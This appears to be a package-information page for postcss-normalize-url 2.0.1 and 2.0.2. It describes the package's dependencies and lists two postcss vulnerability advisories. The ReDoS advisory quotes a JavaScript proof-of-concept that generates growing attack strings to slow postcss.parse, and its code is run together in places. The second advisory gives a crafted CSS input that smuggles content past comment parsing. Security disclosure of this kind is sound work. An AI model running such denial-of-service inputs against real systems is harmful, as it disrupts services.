postcss-normalize-url is a PostCSS plugin designed to normalize URLs within your CSS, ensuring consistency and preventing potential issues caused by variations in URL formatting. Both versions 2.0.1 and 2.0.2 offer the same core functionality using dependencies like postcss for CSS parsing, css-list for handling CSS lists, normalize-url for the URL normalization logic itself, object-assign for object property copying, and is-absolute-url to detect absolute URLs. These versions are targeted at developers who want to automate and standardize URL handling within their CSS workflow.
The key difference between versions 2.0.1 and 2.0.2 lies primarily in the release date, suggesting that version 2.0.2 likely includes bug fixes or minor improvements over version 2.0.1. The package.json files are nearly identical, meaning there were no significant overhauls or feature additions. For developers, upgrading to the latest patch version, 2.0.2, is generally recommended to benefit from any potential stability enhancements or resolved edge cases. The devDependencies section includes tools for testing (tape, tap-spec), code linting (jshint, jshint-stylish), which ensures code quality. Given the frequent usage by front-end developers, these updates help achieve website performance and maintainability by optimizing assets loading and reducing potential errors due to inconsistent URLs.
All the vulnerabilities related to the version 2.0.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.